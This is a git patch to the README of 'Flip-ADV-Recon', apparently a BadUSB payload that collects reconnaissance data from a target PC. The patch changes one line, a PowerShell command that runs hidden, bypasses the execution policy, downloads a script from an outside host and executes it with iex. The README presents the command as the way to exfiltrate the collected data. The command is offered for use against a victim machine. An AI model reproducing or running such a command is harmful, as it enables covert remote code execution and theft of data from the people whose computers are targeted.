From 577e90da2730412b2f347dca5c2826ffad035ba8 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sun, 1 Jan 2023 17:12:30 -0600 Subject: [PATCH] Update README.md --- Payloads/Flip-ADV-Recon/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-ADV-Recon/README.md b/Payloads/Flip-ADV-Recon/README.md index 8ebb0db..c4c8441 100644 --- a/Payloads/Flip-ADV-Recon/README.md +++ b/Payloads/Flip-ADV-Recon/README.md @@ -67,7 +67,7 @@ This program enumerates a target PC to collect as much recon data as possible fo Fill in either or both of these two methods to exfil your collected data ``` -powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/aucrjmf | iex +powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/aucrjmf | iex ```

(back to top)